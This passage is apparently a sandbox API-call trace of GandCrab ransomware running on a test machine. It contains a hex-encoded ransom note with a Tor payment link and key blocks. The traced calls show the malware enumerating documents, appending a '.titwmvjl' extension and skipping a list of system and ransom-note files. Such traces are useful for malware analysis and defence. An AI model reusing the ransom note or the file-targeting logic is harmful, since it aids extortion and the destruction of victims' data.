6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0089.629] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0089.630] CloseHandle (hObject=0x2ac) returned 1 [0089.630] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.630] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.631] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x22, wMilliseconds=0x3af)) [0089.631] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.631] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.631] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.631] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\d2ca4a09d2ca4deb61a.lock") returned 67 [0089.631] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0089.631] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.631] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\") returned 43 [0089.632] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\*" [0089.632] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5034f8 [0089.632] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.632] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.632] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.632] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.632] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.632] lstrcmpW (lpString1="94_Hb-8K5E.pdf", lpString2=".") returned 1 [0089.632] lstrcmpW (lpString1="94_Hb-8K5E.pdf", lpString2="..") returned 1 [0089.632] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\", lpString2="94_Hb-8K5E.pdf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf" [0089.632] lstrlenW (lpString=".titwmvjl") returned 9 [0089.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf") returned 57 [0089.632] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.632] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf.titwmvjl") returned 66 [0089.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf") returned 57 [0089.632] lstrlenW (lpString=".pdf") returned 4 [0089.632] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.633] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pdf ") returned 5 [0089.633] lstrcmpiW (lpString1=".pdf", lpString2=".titwmvjl") returned -1 [0089.633] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.633] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf") returned 57 [0089.633] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf") returned 57 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="desktop.ini") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="autorun.inf") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="ntuser.dat") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="iconcache.db") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="bootsect.bak") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="boot.ini") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="ntuser.dat.log") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="thumbs.db") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="KRAB-DECRYPT.html") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="CRAB-DECRYPT.html") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="ntldr") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", 